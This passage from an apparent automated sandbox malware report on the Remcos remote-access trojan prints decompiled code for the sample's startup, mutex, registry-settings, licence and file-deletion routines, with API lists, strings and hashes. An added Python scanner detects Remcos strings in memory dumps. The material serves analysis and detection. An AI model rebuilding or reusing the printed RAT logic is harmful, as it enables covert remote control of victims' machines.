                              0x0043b795
                              0x0043b7b1
                              0x0043b7b1
                              0x0043b7ba
                              0x0043b7c3

                              APIs
                              • GetCurrentProcess.KERNEL32(0000000C,?,0043B75F,0000000C,00468178,0000000C), ref: 0043B7AA
                              • TerminateProcess.KERNEL32(00000000,?,0043B75F,0000000C,00468178,0000000C), ref: 0043B7B1
                              • ExitProcess.KERNEL32 ref: 0043B7C3
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Process$CurrentExitTerminate
                              • String ID:
                              • API String ID: 1703294689-0
                              • Opcode ID: d2efcfef409a5a836f4afb556700df06fc3074a776be1555a25bdbd19de9e5a4
                              • Instruction ID: 91f09eb10ad8882fafd7c3a50809be48a5acae071be7bd6b9a99ec4421295efe
                              • Opcode Fuzzy Hash: d2efcfef409a5a836f4afb556700df06fc3074a776be1555a25bdbd19de9e5a4
                              • Instruction Fuzzy Hash: D9E0B631400648ABCF12AF55DD0AA993B69EF94787F004065FA058A632CB39DE92CB98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0042F1CD() {
                              				_Unknown_base(*)()* _t1;
                              
                              				_t1 = SetUnhandledExceptionFilter(E0042F1D9); // executed
                              				return _t1;
                              			}

                              0x0042f1d2
                              0x0042f1d8

                              APIs
                              • SetUnhandledExceptionFilter.KERNELBASE(Function_0002F1D9,0042EF00), ref: 0042F1D2
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 229e7487e4b619eafed6bfeacb774be22e42fe1f315c3811e96dc54caa77ac2a
                              • Instruction ID: cbbfc4c934c794425517924e3dd5babbab0d2174eef7e37b5e0b749d7271a00e
                              • Opcode Fuzzy Hash: 229e7487e4b619eafed6bfeacb774be22e42fe1f315c3811e96dc54caa77ac2a
                              • Instruction Fuzzy Hash:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 89%
                              			E0040C641(void* __edx, void* __eflags, char* _a12) {
                              				char _v524;
                              				char _v700;
                              				char _v720;
                              				char _v724;
                              				char _v728;
                              				char _v744;
                              				char _v756;
                              				char _v760;
                              				char _v772;
                              				struct _SECURITY_ATTRIBUTES* _v776;
                              				signed int _v780;
                              				char _v784;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				void* _t69;
                              				void* _t76;
                              				void** _t83;
                              				void* _t87;
                              				CHAR* _t90;
                              				long _t92;
                              				int _t94;
                              				char _t97;
                              				void* _t98;
                              				void* _t102;
                              				void* _t118;
                              				void* _t119;
                              				char _t127;
                              				char* _t129;
                              				signed char* _t131;
                              				signed char* _t133;
                              				void* _t136;
                              				void* _t138;
                              				void* _t155;
                              				intOrPtr _t157;
                              				void* _t158;
                              				CHAR* _t174;
                              				intOrPtr* _t177;
                              				void* _t179;
                              				void* _t185;
                              				char* _t188;
                              				void* _t191;
                              				char* _t195;
                              				void* _t202;
                              				signed short* _t206;
                              				void* _t207;
                              				void* _t208;
                              				signed int _t209;
                              				void* _t215;
                              				CHAR* _t221;
                              				void* _t223;
                              				char* _t226;
                              				char* _t228;
                              				intOrPtr* _t230;
                              				void* _t232;
                              				intOrPtr* _t237;
                              				intOrPtr* _t241;
                              				void* _t243;
                              				void* _t251;
                              				void* _t262;
                              				void* _t265;
                              				struct _SECURITY_ATTRIBUTES* _t266;
                              				int _t269;
                              				char* _t352;
                              				signed int _t374;
                              				signed int _t378;
                              				int _t380;
                              				signed int _t386;
                              				signed int _t389;
                              				intOrPtr _t419;
                              				void* _t429;
                              				void* _t431;
                              				signed int _t447;
                              				void* _t450;
                              				char* _t457;
                              				void* _t458;
                              				char* _t461;
                              				void* _t463;
                              				void* _t468;
                              				char* _t473;
                              				intOrPtr* _t477;
                              				void* _t480;
                              				void* _t481;
                              				void* _t482;
                              				signed int _t488;
                              				void* _t491;
                              				void* _t492;
                              				void* _t493;
                              				void* _t495;
                              				void* _t501;
                              				void* _t502;
                              
                              				_t440 = __edx;
                              				_push(_t265);
                              				L0040CFBE( &_v724, __edx, __eflags);
                              				_t491 = (_t488 & 0xfffffff8) - 0x2f4;
                              				E004020CC(_t265, _t491, __edx, __eflags, 0x46c59c);
                              				_t492 = _t491 - 0x18;
                              				E004020CC(_t265, _t492, __edx, __eflags,  &_v728);
                              				_t69 = L00416DD0( &_v756, __edx);
                              				_t493 = _t492 + 0x30;
                              				E0040D7F8(__edx, _t69);
                              				L00401E54( &_v760, __edx);
                              				_t281 = _a12;
                              				if( *_a12 != 0x2d) {
                              					L6:
                              					_t457 = 0x46c578;
                              					__eflags =  *((char*)(L00401F75(L00401E29(0x46c578, _t440, __eflags, 3))));
                              					 *0x46bb05 = __eflags != 0;
                              					_t76 = E0040530D(_t265,  &_v756, E004075E8( &_v780, "Software\\", __eflags, L00401E29(0x46c578, _t440, __eflags, 0xe)), 0x46c578, __eflags, "\\");
                              					_t467 = 0x46c518;
                              					L00401FB1(0x46c518, _t75, 0x46c518, _t76);
                              					L00401FA7();
                              					L00401FA7();
                              					_t266 = 0;
                              					L00401E29(0x46c578, _t75, __eflags, 0x32);
                              					__eflags =  *(E004051EA(0));
                              					 *0x46bd4e = __eflags != 0;
                              					L00401E29(0x46c578, _t75, __eflags, 0x33);
                              					_t83 = E004051EA(0);
                              					__eflags =  *_t83;
                              					 *0x46bd4f =  *_t83 != 0;
                              					__eflags =  *0x46bd4e - _t266; // 0x0
                              					if(__eflags == 0) {
                              						L8:
                              						_v776 = _t266;
                              						_t468 = OpenMutexA(0x100000, _t266, "Remcos_Mutex_Inj");
                              						__eflags = _t468;
                              						if(_t468 != 0) {
                              							WaitForSingleObject(_t468, 0xea60);
                              							CloseHandle(_t468);
                              						}
                              						_t443 = L00401F75(0x46c518); // executed
                              						_t87 = E00410275(_t86, "Inj",  &_v776); // executed
                              						__eflags = _t87;
                              						if(__eflags != 0) {
                              							_t443 = L00401F75(0x46c518);
                              							E004106D2(_t256, __eflags, "Inj");
                              						}
                              						L00401F8D(0x46c548, L00401E29(_t457, _t443, __eflags, 0xe));
                              						_t90 = L00401F75(0x46c548);
                              						_t458 = 0;
                              						_t269 = 1;
                              						CreateMutexA(0, 1, _t90); // executed
                              						_t92 = GetLastError();
                              						__eflags = _t92 - 0xb7;
                              						if(_t92 == 0xb7) {
                              							L45:
                              							L00401FA7();
                              							_t94 = _t269;
                              							goto L5;
                              						} else {
                              							E0040D072();
                              							GetModuleFileNameW(0, 0x46bb08, 0x104);
                              							_t97 = L00416F6C(0x46c548);
                              							_push(0x46c548);
                              							_t444 = 0x80000002;
                              							 *0x46beb4 = _t97;
                              							_t98 = E004102D2( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName");
                              							_t495 = _t493 + 0xc;
                              							L00401FB1(0x46c5b4, 0x80000002, 0x46c5b4, _t98);
                              							L00401FA7();
                              							__eflags =  *0x46beb4;
                              							if( *0x46beb4 == 0) {
                              								_push(" (32 bit)");
                              							} else {
                              								_push(" (64 bit)");
                              							}
                              							E004059B5(_t269, 0x46c5b4, _t458);
                              							_t102 =  *0x46bd24; // 0x0
                              							__eflags = _t102;
                              							if(_t102 != 0) {
                              								 *0x46a9d0 =  *_t102();
                              							}
                              							_t473 = 0x46c578;
                              							__eflags = _v776 - _t458;
                              							if(__eflags == 0) {
                              								_t429 = L00401E29(0x46c578, _t444, __eflags, 0x2e);
                              								__eflags =  *((char*)(L00401F75(_t429)));
                              								if(__eflags != 0) {
                              									__eflags =  *0x46bd24 - _t458; // 0x0
                              									if(__eflags != 0) {
                              										__eflags =  *0x46a9d0 - _t458; // 0x2
                              										if(__eflags == 0) {
                              											_t444 = L00401F75(0x46c518);
                              											_t251 = E0041022B(0x46c518, _t250, "origmsc");
                              											_pop(_t431);
                              											__eflags = _t251;
                              											if(__eflags == 0) {
                              												L00405F2A(_t269, _t431, _t444);
                              											}
                              										} else {
                              											_push(_t429);
                              											_push(_t429);
                              											__eflags = L0040AAB0() - 0xffffffff;
                              											if(__eflags == 0) {
                              												E00406024(__eflags);
                              											}
                              										}
                              									}
                              								}
                              							}
                              							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 0x27))));
                              							if(__eflags != 0) {
                              								E0040D797();
                              							}
                              							L00409DCB(_t269, 0x46c4e8, L00401F75(L00401E29(_t473, _t444, __eflags, 0xb)));
                              							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 4))));
                              							 *0x46bb06 = __eflags != 0;
                              							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 5))));
                              							 *0x46baff = __eflags != 0;
                              							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 8))));
                              							 *0x46bb04 = __eflags != 0;
                              							__eflags =  *((char*)(L00401F75(L00401E29(_t473, _t444, __eflags, 3))));
                              							if(__eflags != 0) {
                              								_t237 = L00401F75(L00401E29(_t473, _t444, __eflags, 0x30));
                              								_t24 = _t237 + 2; // 0x2
                              								_t444 = _t24;
                              								do {
                              									_t419 =  *_t237;
                              									_t237 = _t237 + 2;
                              									__eflags = _t419 - _t458;
                              								} while (_t419 != _t458);
                              								__eflags = _t237 - _t444;
                              								if(__eflags != 0) {
                              									_t241 = L00401F75(L00401E29(_t473, _t444, __eflags, 9));
                              									_t243 = L00401F75(L00401E29(0x46c578, _t444, __eflags, 0x30));
                              									_t444 =  *_t241;
                              									L00401EDA(0x46c530,  *_t241, _t241, E004179B3( &_v780,  *_t241, _t243));
                              									L00401ED0();
                              									_t473 = 0x46c578;
                              								}
                              							}
                              							__eflags = _v776 - _t458;
                              							if(_v776 != _t458) {
                              								E00431810(_t458,  &_v524, _t458, 0x208);
                              								_t118 = E00402469();
                              								_t119 = L00401F75(0x46c560);
                              								_t445 = L00401F75(0x46c518);
                              								E00410420(_t121, "exepath",  &_v524, 0x208, _t119, _t118);
                              								_t493 = _t495 + 0x20;
                              								L00409DCB(_t269, 0x46c500,  &_v524);
                              								_t461 = 0x46c578;
                              								goto L47;
                              							} else {
                              								__eflags =  *0x46bb05;
                              								if(__eflags == 0) {
                              									L00409DCB(_t269, 0x46c500, 0x46bb08);
                              								} else {
                              									_t226 = L00401F75(L00401E29(_t473, _t444, __eflags, 0x1e));
                              									_t228 = L00401F75(L00401E29(_t473, _t444, __eflags, 0xc));
                              									_t230 = L00401F75(L00401E29(0x46c578, _t444, __eflags, 9));
                              									__eflags =  *_t226;
                              									__eflags =  *_t228;
                              									_t473 = 0x46c578;
                              									_t232 = L00401F75(L00401E29(0x46c578, _t444,  *_t228, 0xa));
                              									L0040AD0A( *_t230, L00401F75(L00401E29(0x46c578, _t444, __eflags, 0x30)), _t232, ((_t229 & 0xffffff00 |  *_t226 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t229 & 0xffffff00 |  *_t226 != 0x00000000) & 0x000000ff);
                              									_t495 = _t495 + 0xc;
                              									_t269 = 1;
                              									_t458 = 0;
                              								}
                              								_t202 = E00402469();
                              								_t447 = 2;
                              								_t386 =  ~(0 | __eflags > 0x00000000) | (_t202 + 0x00000001) * _t447;
                              								_push(_t386);
                              								_v780 = _t386;
                              								_t482 = L0042EE1E(_t386, (_t202 + 1) * _t447 >> 0x20, _t473, __eflags);
                              								__eflags = _t482;
                              								if(_t482 == 0) {
                              									_t482 = _t458;
                              								} else {
                              									E00431810(_t458, _t482, _t458, _v780);
                              									_t495 = _t495 + 0xc;
                              								}
                              								_t206 = L00401ECB(0x46c500);
                              								_t450 = _t482 - _t206;
                              								__eflags = _t450;
                              								_t463 = 2;
                              								do {
                              									_t389 =  *_t206 & 0x0000ffff;
                              									 *(_t206 + _t450) = _t389;
                              									_t206 = _t206 + _t463;
                              									__eflags = _t389;
                              								} while (_t389 != 0);
                              								_push(_t389);
                              								_t207 = E00402469();
                              								_t208 = L00401F75(0x46c560);
                              								_t209 = E00402469();
                              								E00410670(L00401F75(0x46c518), __eflags, "exepath", _t482, 2 + _t209 * 2, _t208, _t207);
                              								L0042EE27(_t482);
                              								_t461 = 0x46c578;
                              								_push(_t269);
                              								_t215 = L00401F75(L00401E29(0x46c578, _t211, __eflags, 0x34));
                              								_t501 = _t495 + 0x1c - 0x18;
                              								E00402064(_t269, _t501, _t215);
                              								_push("licence");
                              								E00410497(0x46c518, L00401F75(0x46c518));
                              								_t493 = _t501 + 0x20;
                              								L00401E29(0x46c578, _t217, __eflags, 0xd);
                              								_t445 = "0";
                              								__eflags = L0040EE79(__eflags);
                              								if(__eflags == 0) {
                              									L47:
                              									_t127 = E00436079(_t125, L00401F75(L00401E29(_t461, _t445, __eflags, 0x28)));
                              									 *0x46bb07 = _t127;
                              									__eflags = _t127 - 2;
                              									if(_t127 != 2) {
                              										__eflags = _t127 - _t269;
                              										if(__eflags == 0) {
                              											_t380 = 0;
                              											__eflags = 0;
                              											goto L51;
                              										}
                              									} else {
                              										_t380 = _t269;
                              										L51:
                              										E004188B1(_t269, _t380, _t445);
                              										__eflags = 0;
                              										CreateThread(0, 0, E00418680, 0, 0, 0);
                              									}
                              									_t129 = L00401F75(L00401E29(_t461, _t445, __eflags, 0x37));
                              									_t131 = L00401F75(L00401E29(_t461, _t445, __eflags, 0x10));
                              									_t133 = L00401F75(L00401E29(_t461, _t445, __eflags, 0xf));
                              									__eflags =  *_t129;
                              									_t467 = 0x46c578;
                              									_t136 = E00436079(_t134, L00401F75(L00401E29(0x46c578, _t445,  *_t129, 0x36)));
                              									_t138 = L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x11));
                              									E0040846F(_t131,  *_t133 & 0x000000ff,  *_t131 & 0x000000ff, L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x31)), _t138, _t136, (_t132 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff);
                              									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x14)))) - 1;
                              									if(__eflags != 0) {
                              										_t457 = CreateThread;
                              									} else {
                              										_t191 = 2;
                              										_t481 = L0042EB70(_t445, 0x46c578, __eflags, _t191);
                              										 *_t481 = 0;
                              										_t378 = L00401E29(0x46c578, _t445, __eflags, 0x35);
                              										_t195 = L00401F75(_t378);
                              										_t457 = CreateThread;
                              										__eflags =  *_t195;
                              										 *((char*)(_t481 + 1)) = _t378 & 0xffffff00 | __eflags != 0x00000000;
                              										CreateThread(0, 0, E004152D7, _t481, 0, 0);
                              										_t467 = 0x46c578;
                              									}
                              									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(_t467, _t445, __eflags, 0x16)))) - 1;
                              									if(__eflags == 0) {
                              										_t185 = 2;
                              										_t480 = L0042EB70(_t445, _t467, __eflags, _t185);
                              										 *_t480 = 1;
                              										_t374 = L00401E29(0x46c578, _t445, __eflags, 0x35);
                              										_t188 = L00401F75(_t374);
                              										__eflags =  *_t188;
                              										__eflags = 0;
                              										 *((char*)(_t480 + 1)) = _t374 & 0xffffff00 |  *_t188 != 0x00000000;
                              										CreateThread(0, 0, E004152D7, _t480, 0, 0);
                              										_t467 = 0x46c578;
                              									}
                              									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(_t467, _t445, __eflags, 0x23)))) - 1;
                              									if(__eflags == 0) {
                              										 *0x46ba75 = 1;
                              										_t177 = L00401F75(L00401E29(_t467, _t445, __eflags, 0x25));
                              										_t179 = L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x26));
                              										_t445 =  *_t177;
                              										L00401EDA(0x46c0e0,  *_t177, _t177, E00417967( &_v780,  *_t177, _t179));
                              										L00401ED0();
                              										__eflags = 0;
                              										CreateThread(0, 0, 0x401bad, 0, 0, 0);
                              										_t467 = 0x46c578;
                              									}
                              									__eflags =  *((intOrPtr*)(L00401F75(L00401E29(_t467, _t445, __eflags, 0x2b)))) - 1;
                              									if(__eflags == 0) {
                              										_t467 = L00401F75(L00401E29(_t467, _t445, __eflags, 0x2c));
                              										_t174 = E00436079(_t172, L00401F75(L00401E29(0x46c578, _t445, __eflags, 0x2d)));
                              										__eflags =  *_t467;
                              										_t445 = _t174;
                              										__eflags =  *_t467 != 0;
                              										L0040AA16(_t174);
                              									}
                              									L00401EDA(0x46c584, _t445, _t467, E004166F6( &_v772, _t457, __eflags));
                              									_t352 =  &_v776;
                              									L00401ED0();
                              									_t155 =  *0x46bd18; // 0x0
                              									_t266 = 0;
                              									__eflags = _t155;
                              									if(_t155 != 0) {
                              										 *_t155(0);
                              									}
                              									CreateThread(_t266, _t266, E0040D455, _t266, _t266, _t266);
                              									__eflags =  *0x46bd4e;
                              									if( *0x46bd4e != 0) {
                              										CreateThread(_t266, _t266, E0040F4B7, _t266, _t266, _t266);
                              									}
                              									__eflags =  *0x46bd4f;
                              									if( *0x46bd4f != 0) {
                              										CreateThread(_t266, _t266, E0040F9D5, _t266, _t266, _t266);
                              									}
                              									_t157 =  *0x46a9d0; // 0x2
                              									_t158 = _t157 - _t266;
                              									__eflags = _t158;
                              									if(__eflags == 0) {
                              										goto L71;
                              									} else {
                              										__eflags = _t158 - 1;
                              										if(__eflags == 0) {
                              											_push("Administrator");
                              											goto L72;
                              										}
                              									}
                              									goto L73;
                              								} else {
                              									_t221 = L00401E29(0x46c578, "0", __eflags, 0xd);
                              									_t502 = _t493 - 0x18;
                              									_t445 = _t221;
                              									L00416C32(_t502, _t221);
                              									_t223 = E0040D1AD(__eflags);
                              									_t493 = _t502 + 0x18;
                              									__eflags = _t223 - _t269;
                              									if(__eflags != 0) {
                              										goto L47;
                              									} else {
                              										_t269 = 3;
                              										goto L45;
                              									}
                              								}
                              							}
                              						}
                              					} else {
                              						_v780 = 0;
                              						_t262 = E00410275(L00401F75(0x46c518), "WD",  &_v780);
                              						__eflags = _t262;
                              						if(_t262 != 0) {
                              							E004106D2(L00401F75(0x46c518), __eflags, "WD");
                              							E0040F785();
                              							L71:
                              							_push("User");
                              							L72:
                              							E004075C4(_t266, _t493 - 0x18, "Access level: ", _t457, __eflags, E00402064(_t266,  &_v776));
                              							E00402064(_t266, _t493 - 4, "[Info]");
                              							E004165D8(_t266, _t457);
                              							_t352 =  &_v784;
                              							L00401FA7();
                              							L73:
                              							E00411319();
                              							asm("int3");
                              							_push(_t467);
                              							_t477 = _t352 + 0x68;
                              							E0040D8B5(_t266, _t477, _t477);
                              							_t281 = _t477;
                              							 *_t281 = 0x4607a0;
                              							 *_t281 = 0x46075c;
                              							return L0042FE13(_t281);
                              						} else {
                              							goto L8;
                              						}
                              					}
                              				} else {
                              					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
                              					if(__eflags != 0) {
                              						goto L6;
                              					} else {
                              						__eax =  *(__ecx + 2) & 0x000000ff;
                              						__eflags = __al;
                              						if(__eflags != 0) {
                              							goto L6;
                              						} else {
                              							_push(__ecx);
                              							_push(__ecx);
                              							__ecx =  &_v700;
                              							__eax = E0040D8E4( &_v700, __edx, __eflags, "licence_code.txt", 2);
                              							__ecx = 0x46c578;
                              							__ecx = L00401E29(0x46c578, __edx, __eflags, 0x34);
                              							__edx = __eax;
                              							__ecx =  &_v720;
                              							__eax = L0040EC5B( &_v720, __edx, __eflags);
                              							__ecx =  &_v720;
                              							__eax = E0040D895( &_v720, __edx, __eflags);
                              							__ecx =  &_v720;
                              							L74();
                              							__ecx =  &_v744;
                              							L00401FA7() = 0;
                              							__eax = 1;
                              							__eflags = 1;
                              							L5:
                              							return _t94;
                              						}
                              					}
                              				}
                              			}

                              APIs
                              • OpenMutexA.KERNEL32 ref: 0040C7DA
                              • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C7EC
                              • CloseHandle.KERNEL32(00000000), ref: 0040C7F3
                              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 0040C852
                              • GetLastError.KERNEL32 ref: 0040C858
                              • GetModuleFileNameW.KERNEL32(00000000,0046BB08,00000104), ref: 0040C879
                                • Part of subcall function 0040EC5B: __EH_prolog.LIBCMT ref: 0040EC60
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
                              • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$Inj$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$User$[Info]$exepath$licence$licence_code.txt$origmsc
                              • API String ID: 1247502528-1622708067
                              • Opcode ID: 2bd13613e6f57334565f536a5e53c97132575cf9c7749eeee8e38709d51e8a29
                              • Instruction ID: 42bfda91432e7fc4dea79f371f9b9f268822a4ed28c20108b284d7b9b352ec02
                              • Opcode Fuzzy Hash: 2bd13613e6f57334565f536a5e53c97132575cf9c7749eeee8e38709d51e8a29
                              • Instruction Fuzzy Hash: 6132F460B443516BDA15B7729CA7B3E25898B81748F04053FF542BB2E3EEBC9D41839E
                              Uniqueness

                              Uniqueness Score: -1.00%
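The initialisation routine above works from a fixed set of runtime strings (see its String ID line: Remcos_Mutex_Inj, licence_code.txt, exepath, licence, the "Access level: " banner with "Administrator" or "User"), and it copies at least one of them as a wide string (the 16-bit copy loop just before the "exepath" write). The following is an added example, not part of the Joe Sandbox report or of the sample, that scans a memory-dump buffer for those strings in both ASCII and UTF-16LE, recovers the access-level banner if the log line was built, and applies a simple distinct-marker threshold. The sample buffer and the threshold are constructed for the demo.

```python
"""Triage scanner for Remcos runtime strings in a memory dump (added example).

Searches a byte buffer for the strings the decompiled initialisation routine
references, in ASCII and UTF-16LE, and reports offsets plus a coarse verdict.
"""
import re

# Markers taken from the report's "String ID" line for the routine above.
REMCOS_MARKERS = [
    "Remcos_Mutex_Inj",
    "licence_code.txt",
    "Access level: ",
    "exepath",
    "licence",
    "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion",
]


def build_patterns(markers):
    """Map each marker to compiled byte regexes for its ASCII and UTF-16LE forms."""
    pats = {}
    for m in markers:
        pats[m] = {
            "ascii": re.compile(re.escape(m.encode("ascii"))),
            "utf16le": re.compile(re.escape(m.encode("utf-16-le"))),
        }
    return pats


def scan_dump(data: bytes, markers=REMCOS_MARKERS):
    """Return {marker: [(encoding, offset), ...]} for every marker found in data."""
    hits = {}
    for marker, encs in build_patterns(markers).items():
        found = []
        for enc, pat in encs.items():
            for mo in pat.finditer(data):
                found.append((enc, mo.start()))
        if found:
            hits[marker] = sorted(found, key=lambda t: t[1])
    return hits


def access_level_banner(data: bytes):
    """Recover the 'Access level: <Administrator|User>' log line if it was built."""
    mo = re.search(rb"Access level: (Administrator|User)", data)
    return mo.group(1).decode() if mo else None


def verdict(hits, min_markers=3):
    """Heuristic (assumed threshold): several distinct markers in one buffer is a strong signal."""
    return "remcos-likely" if len(hits) >= min_markers else "inconclusive"


# Constructed sample dump (not from the report): padding, the mutex name in
# ASCII, the licence file name in UTF-16LE, and a built access-level log line.
SAMPLE_DUMP = (
    b"\x00" * 32
    + b"Remcos_Mutex_Inj\x00"
    + b"\x90" * 16
    + "licence_code.txt".encode("utf-16-le") + b"\x00\x00"
    + b"Access level: Administrator\x00"
    + b"\xcc" * 8
)

if __name__ == "__main__":
    h = scan_dump(SAMPLE_DUMP)
    for marker, locs in h.items():
        print(f"{marker!r}: {locs}")
    print("banner:", access_level_banner(SAMPLE_DUMP))
    print("verdict:", verdict(h))
```

Note that the short marker "licence" also fires on the prefix of "licence_code.txt"; the scanner reports both so the analyst can see the overlap rather than silently deduplicating.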

                              C-Code - Quality: 100%
                              			E00410275(char* __edx, char* _a4, char* _a8) {
                              				void* _v8;
                              				int _v12;
                              				int _v16;
                              				int _t12;
                              				long _t14;
                              				long _t18;
                              
                              				_t12 = 4;
                              				_v12 = _t12;
                              				_v16 = _t12;
                              				_t14 = RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v8); // executed
                              				if(_t14 != 0) {
                              					return 0;
                              				}
                              				_t18 = RegQueryValueExA(_v8, _a4, 0,  &_v16, _a8,  &_v12);
                              				return RegCloseKey(_v8) & 0xffffff00 | _t18 == 0x00000000;
                              			}

                              APIs
                              • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00410295
                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 004102B3
                              • RegCloseKey.ADVAPI32(?), ref: 004102BE
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID:
                              • API String ID: 3677997916-0
                              • Opcode ID: 6020211f2f41a99924b2582c1e80447f15e98d83b67fb738d9560e140564669e
                              • Instruction ID: da35563d8025d65dfadb3f1a4e24c633330656b2ed15e4664ff05724ceb20d8f
                              • Opcode Fuzzy Hash: 6020211f2f41a99924b2582c1e80447f15e98d83b67fb738d9560e140564669e
                              • Instruction Fuzzy Hash: 90F01D7690030CBFDF109FA09D05BEE7BBCEB04B51F1040A5FE04E6195D2719B549B94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              C-Code - Quality: 82%
                              			E00406930(short* __edx, void* __eflags, intOrPtr _a4) {
                              				char _v108;
                              				void* _v112;
                              				char _v132;
                              				char _v136;
                              				char _v140;
                              				char _v152;
                              				char _v156;
                              				char _v160;
                              				void* _v176;
                              				char _v188;
                              				char _v192;
                              				void* _v200;
                              				char _v204;
                              				char _v208;
                              				char _v212;
                              				char _v216;
                              				char _v228;
                              				char _v232;
                              				char _v236;
                              				char _v240;
                              				char _v244;
                              				char _v248;
                              				char _v252;
                              				char _v256;
                              				char _v260;
                              				char _v264;
                              				char _v268;
                              				char _v272;
                              				char _v276;
                              				char _v280;
                              				char _v284;
                              				char _v288;
                              				char _v292;
                              				char _v296;
                              				char _v300;
                              				char _v324;
                              				char _v336;
                              				char _v344;
                              				char _v368;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				signed char _t163;
                              				signed int _t165;
                              				void* _t169;
                              				void* _t174;
                              				signed int _t175;
                              				void* _t190;
                              				void* _t205;
                              				signed int _t207;
                              				void* _t221;
                              				int _t231;
                              				void* _t238;
                              				void* _t239;
                              				void* _t252;
                              				void* _t259;
                              				signed int _t264;
                              				void* _t268;
                              				void* _t286;
                              				short* _t297;
                              				void* _t298;
                              				void* _t309;
                              				void* _t325;
                              				void* _t335;
                              				void* _t341;
                              				void* _t343;
                              				void* _t345;
                              				void* _t349;
                              				void* _t353;
                              				void* _t363;
                              				void* _t365;
                              				void* _t386;
                              				void* _t389;
                              				void* _t556;
                              				void* _t585;
                              				intOrPtr _t590;
                              				intOrPtr _t591;
                              				signed int _t592;
                              				signed int _t594;
                              				signed int _t597;
                              				void* _t604;
                              				void* _t606;
                              				void* _t608;
                              				void* _t610;
                              				void* _t612;
                              				signed int _t613;
                              				void* _t616;
                              				void* _t617;
                              				void* _t618;
                              				void* _t619;
                              				void* _t620;
                              				void* _t621;
                              				void* _t622;
                              				void* _t625;
                              				void* _t630;
                              				void* _t631;
                              				void* _t632;
                              				void* _t634;
                              				void* _t636;
                              				void* _t658;
                              				void* _t659;
                              				void* _t660;
                              				void* _t661;
                              				void* _t664;
                              				void* _t666;
                              
                              				_t665 = __eflags;
                              				_t564 = __edx;
                              				_push(_t365);
                              				_t590 = _a4;
                              				_push(_t585);
                              				E004020CC(_t365,  &_v156, __edx, __eflags, _t590 + 0x1c);
                              				SetEvent( *(_t590 + 0x34));
                              				_t591 =  *((intOrPtr*)(L00401F75( &_v160)));
                              				E00404286( &_v160,  &_v136, 4, 0xffffffff);
                              				_t616 = (_t613 & 0xfffffff8) - 0xec;
                              				E004020CC(0x46c238, _t616, _t564, _t665, 0x46c238);
                              				_t617 = _t616 - 0x18;
                              				E004020CC(0x46c238, _t617, _t564, _t665,  &_v152);
                              				L00416DD0( &_v288, _t564);
                              				_t618 = _t617 + 0x30;
                              				_t666 = _t591 - 0x8b;
                              				if(_t666 > 0) {
                              					_t592 = _t591 - 0x8c;
                              					__eflags = _t592;
                              					if(__eflags == 0) {
                              						E0040425F(0x46c238,  &_v256, L00401F75(L00401E29( &_v264, _t564, __eflags, 0)));
                              						_t163 = GetFileAttributesW(L00401ECB( &_v260));
                              						__eflags = _t163 & 0x00000010;
                              						if((_t163 & 0x00000010) == 0) {
                              							_t165 = DeleteFileW(L00401ECB( &_v260));
                              						} else {
                              							_t165 = E004170AC(L00401ECB( &_v260));
                              						}
                              						__eflags = _t165;
                              						__eflags = _t165 & 0xffffff00 | _t165 != 0x00000000;
                              						if(__eflags == 0) {
                              							_t619 = _t618 - 0x18;
                              							L00416CF4(0x46c238, _t619,  &_v252);
                              							_push(0x55);
                              							L00404A6E(0x46c238, 0x46c2e8,  &_v252, __eflags);
                              							_t169 = L00416C93( &_v232,  &_v280);
                              							_t620 = _t619 - 0x18;
                              							_t567 = "Unable to delete: ";
                              							E004075C4(0x46c238, _t620, "Unable to delete: ", _t585, __eflags, _t169);
